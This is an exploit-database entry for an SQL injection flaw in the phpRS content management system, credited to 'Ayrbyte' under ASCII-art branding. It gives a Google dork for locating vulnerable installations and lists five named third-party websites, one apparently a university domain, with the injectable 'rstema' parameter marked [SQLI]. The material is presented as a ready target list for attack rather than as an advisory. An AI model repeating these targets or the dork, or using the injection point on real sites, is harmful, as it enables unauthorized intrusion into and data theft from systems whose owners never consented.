phpRS - SQL Injection Vulnerability

2012-06-24T00:00:00
ID 1337DAY-ID-18799
Type zdt
Reporter Ayrbyte
Modified 2012-06-24T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ??  %%  %% $$$$$        >>  > ::    ;;;;;;;;
   ?? ?  %% %% $$ $$ ||      >> > ::    ;;    ;;
  ?????   %%%% $$$$$ ||___    >>> ::::: ;;;;;;;
 ??   ??    %% $$$$  ||  ||     > ::    ;;
      %%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;;
    ______________>>Ayrbyte<<_______________
   Gamerz From CREMY | CRazy Experience arMY

Author        : Ayrbyte
Category      : Webapps / 0day 
Title Exploit : phpRS - SQL Injection Vulnerability 
Vendor        : Novinky v phpRS project
URL Vendor    : http://www.phprs.cz/ or http://www.supersvet.cz/phprs/
Google Dork   : inurl:"view.php?cisloclanku=" intext:"Web site powered by phpRS"
0day exploits : 1337day.com Inj3ct0r Exploit DataBase 

==> SAMPLE'S SQLi:
http://access.feld.cvut.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=43%27[SQLI]
http://proatom.luksoft.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=25%27[SQLI]
http://www.druhasvetova.sk/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=46%27[SQLI]
http://www.bezrucka.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=13&stromhlmenu=13%27[SQLI]
http://www.trask.sk/phprs/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=8%27[SQLI]

MORE IN GOOGLE...



#  0day.today [2018-04-14]  #